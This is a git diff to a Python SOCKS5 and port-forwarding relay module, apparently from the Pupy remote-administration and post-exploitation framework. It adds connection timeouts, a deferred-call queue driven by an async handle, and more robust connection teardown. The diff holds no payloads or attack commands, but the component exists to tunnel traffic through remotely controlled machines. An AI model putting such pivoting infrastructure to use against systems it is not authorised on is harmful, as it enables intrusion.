diff --git a/pupy/packages/all/pyuvproxy.py b/pupy/packages/all/pyuvproxy.py index ef686c55..237dc958 100644 --- a/pupy/packages/all/pyuvproxy.py +++ b/pupy/packages/all/pyuvproxy.py @@ -4,6 +4,9 @@ import rpyc import sys, time import pyuv import struct +import os + +os.putenv('UV_THREADPOOL_SIZE', '1') from netaddr import IPAddress, AddrFormatError from threading import Event, Thread, Lock @@ -15,6 +18,8 @@ from socket import SHUT_RD, SHUT_WR from socket import error as socket_error from socket import inet_ntop +from Queue import Queue, Empty + import socket import random @@ -71,7 +76,7 @@ class ChannelIsNotReady(ValueError): pass class Connection(object): - def __init__(self, neighbor, remote_id=None, socket=None, buffer=None, socks5=False): + def __init__(self, neighbor, remote_id=None, socket=None, buffer=None, socks5=False, timeout=5): self.neighbor = neighbor self.loop = self.neighbor.manager.loop self.socket = socket or pyuv.TCP(self.loop) @@ -80,39 +85,48 @@ class Connection(object): self.remote_local_address = None self.buffer = None self.socks5 = socks5 + self.timer = pyuv.Timer(self.loop) + self.timeout = timeout + + def _connection_timeout(self, handle): + try: + handle.stop() + except: + pass + + self.close(-1, mutual=self.remote_id is not None) def register_remote_id(self, remote_id): self.remote_id = remote_id def on_connected(self, local_address, error): if error: - if self.socks5: - self.socket.write( - struct.pack( - 'BB', 0x5, ERRNO_TO_SOCKS5.get(reason, CODE_GENERAL_SRV_FAILURE) - ) + self.socks5[2:]) - - self.close(error, mutual=False) - else: - if self.socks5: - try: - addr, port = IPAddress(local_address[0]), local_address[1] - + try: + if self.socks5: self.socket.write( struct.pack( - 'BBBB', 0x5, - 0, 0, - ADDR_IPV4 if addr.version == 4 else ADDR_IPV6 - ) + addr.packed + struct.pack('>H', port) - ) + 'BB', 0x5, ERRNO_TO_SOCKS5.get(error, CODE_GENERAL_SRV_FAILURE) + ) + self.socks5[2:]) + finally: + self.close(error, mutual=False) + else: + try: + if self.socks5: + addr, port = IPAddress(local_address[0]), local_address[1] + self.socket.write( + struct.pack( + 'BBBB', 0x5, + 0, 0, + ADDR_IPV4 if addr.version == 4 else ADDR_IPV6 + ) + addr.packed + struct.pack('>H', port)) - except Exception, e: - logging.debug('SOCKS5 response failed: {}'.format(e)) + if self.buffer: + self._on_read_data(self.socket, self.buffer, None) - if self.buffer: - self._on_read_data(self.socket, self.buffer, None) + self.forward() - self.forward() + except: + self.close(-1) def on_data(self, data): if not self.socket: @@ -143,20 +157,14 @@ class Connection(object): else: self.close(error) - def _report_close_remote(self, reason): - self.socket.close() - - try: - self.neighbor.callbacks.on_disconnect( - self.neighbor.remote_id, - self.remote_id, - reason - ) - - except EOFError: - self.neighbor.stop(dead=True) - def _on_connected(self, handle, error): + try: + self.timer.stop() + self.timer.close() + self.timer = None + except: + pass + try: self.neighbor.callbacks.on_connected( self.neighbor.remote_id, @@ -165,41 +173,55 @@ class Connection(object): error=error ) + if error: + try: + self.socket.close() + except: + pass + + else: + self.forward() + except EOFError: self.neighbor.stop(dead=True) - if error: - self.socket.close() - else: - self.forward() - - def _start_connect(self, address): + def connect(self, address): try: + self.timer.start(self._connection_timeout, self.timeout, 0) self.socket.connect(address, self._on_connected) - except: + except Exception, e: self._on_connected(None, -1) - def connect(self, address): - self.loop.queue_work(lambda: self._start_connect(address)) - def forward(self): - self.loop.queue_work(lambda: self.socket.start_read(self._on_read_data)) + self.socket.start_read(self._on_read_data) def close(self, reason, mutual=True): + unregistered = False if mutual: try: - self.loop.queue_work(lambda: self.socket.shutdown( - lambda handle, error: self._report_close_remote(reason))) - except: - self.socket.close() - else: + self.neighbor.callbacks.on_disconnect( + self.neighbor.remote_id, + self.remote_id, + reason + ) + + except EOFError: + self.neighbor.stop(dead=True) + unregistered = True + + try: self.socket.close() + except: + pass - self.neighbor.unregister_connection(self) - - def read_exactly(self, size, callback): - pass + try: + if self.timer: + self.timer.stop() + except: + pass + if not unregistered: + self.neighbor.unregister_connection(self) class Acceptor(object): def __init__(self, neighbor, local_address, forward_address=None): @@ -209,7 +231,9 @@ class Acceptor(object): self.forward_address = forward_address self.associaction = {} self.socket = pyuv.TCP(self.loop) - self.socket.bind(local_address) + + def start(self): + self.socket.bind(self.local_address) self.socket.listen(self._on_connection) def _on_connection(self, handle, error): @@ -396,7 +420,10 @@ class Neighbor(object): connection ].close(-1, mutual=not dead) - del self.manager.neighbors[self.local_id] + try: + del self.manager.neighbors[self.local_id] + except KeyError: + pass def pair(self, local_id, remote_id): self.local_id = local_id @@ -419,7 +446,8 @@ class Neighbor(object): self.connections[connection.local_id] = connection def unregister_connection(self, connection): - del self.connections[connection.local_id] + if connection.local_id in self.connections: + del self.connections[connection.local_id] def register_acceptor(self, acceptor, port): self.acceptors[port] = acceptor @@ -446,31 +474,47 @@ class Neighbor(object): class Manager(Thread): def __init__(self): super(Manager, self).__init__() - self.loop = pyuv.Loop.default_loop() + self.loop = pyuv.Loop() self.neighbors = {} - self.wakeup = Event() - self.stopped = Event() self.ports = {} self.daemon = True + self.wake = pyuv.Async(self.loop, self.sync) + self.queue = Queue() - def stop(self, dead=False): + def sync(self, handle): + while True: + try: + method, args = self.queue.get_nowait() + except Empty: + break + + try: + method(*args) + except Exception, e: + logging.exception('Defered call exception: {}'.format(e)) + + def defer(self, method, *args): + self.queue.put((method, args)) + self.wake.send() + + def _stop(self, dead): for neighbor_id in self.neighbors.keys(): self.neighbors[neighbor_id].stop(dead=dead) + self.wake.close() + for handle in self.loop.handles: + if not handle.closed: + handle.close() - self.stopped.set() - self.wakeup.set() + self.loop.stop() + + def stop(self, dead=False): + self.defer(self._stop, dead) def force_stop(self): self.stop(dead=True) def run(self): - while not self.stopped.is_set(): - self.wakeup.wait() - if self.stopped.is_set(): - break - - self.wakeup.clear() - self.loop.run() + self.loop.run() def get_neighbor(self, neighbor_id): if not neighbor_id in self.neighbors: @@ -478,7 +522,7 @@ class Manager(Thread): return self.neighbors[neighbor_id] - def bind(self, neighbor_id, host='127.0.0.1', port=8080, forward=None): + def _bind(self, neighbor_id, host, port, forward): neighbor = self.get_neighbor(neighbor_id) acceptor = Acceptor( neighbor, @@ -487,8 +531,10 @@ class Manager(Thread): ) neighbor.register_acceptor(acceptor, port) + acceptor.start() - self.wakeup.set() + def bind(self, neighbor_id, host='127.0.0.1', port=8080, forward=None): + self.defer(self._bind, neighbor_id, host, port, forward) def unbind(self, port): for neighbor in self.neighbors.itervalues(): @@ -506,36 +552,43 @@ class Manager(Thread): ).create_connection(remote_id=remote_id) def connect(self, neighbor_id, connection_id, address): - self.get_neighbor( - neighbor_id - ).get_connection( - connection_id - ).connect(address) - - self.wakeup.set() + self.defer( + self.get_neighbor( + neighbor_id + ).get_connection( + connection_id + ).connect, + address + ) def forward(self, neighbor_id, connection_id): - self.get_neighbor( - neighbor_id - ).get_connection( - connection_id - ).forward() - - self.wakeup.set() + self.defer( + self.get_neighbor( + neighbor_id + ).get_connection( + connection_id + ).forward + ) def on_connected(self, neighbor_id, connection_id, local_address, error=None): - connection = self.get_neighbor( - neighbor_id - ).get_connection( - connection_id - ).on_connected(local_address, error) + self.defer( + self.get_neighbor( + neighbor_id + ).get_connection( + connection_id + ).on_connected, + local_address, error + ) def on_data(self, neighbor_id, connection_id, data): - self.get_neighbor( - neighbor_id - ).get_connection( - connection_id - ).on_data(data) + self.defer( + self.get_neighbor( + neighbor_id + ).get_connection( + connection_id + ).on_data, + data + ) def on_disconnect(self, neighbor_id, connection_id, reason=None): neighbor = self.get_neighbor( @@ -547,7 +600,10 @@ class Manager(Thread): connection_id ) - connection.on_disconnect(reason) + self.defer( + connection.on_disconnect, + reason + ) except (ConnectionIsNotExists, ChannelIsNotReady): pass @@ -581,12 +637,15 @@ class Manager(Thread): return remote_id, local_id - def unpair(self, local_id, dead=False): + def _unpair(self, local_id, dead): if not local_id in self.neighbors: raise NeighborIsNotExists(local_id) self.neighbors[local_id].stop(dead=dead) + def unpair(self, local_id, dead=False): + self.defer(self._unpair, local_id, dead) + def list(self, filter_by_local_id=None): results = [] if filter_by_local_id: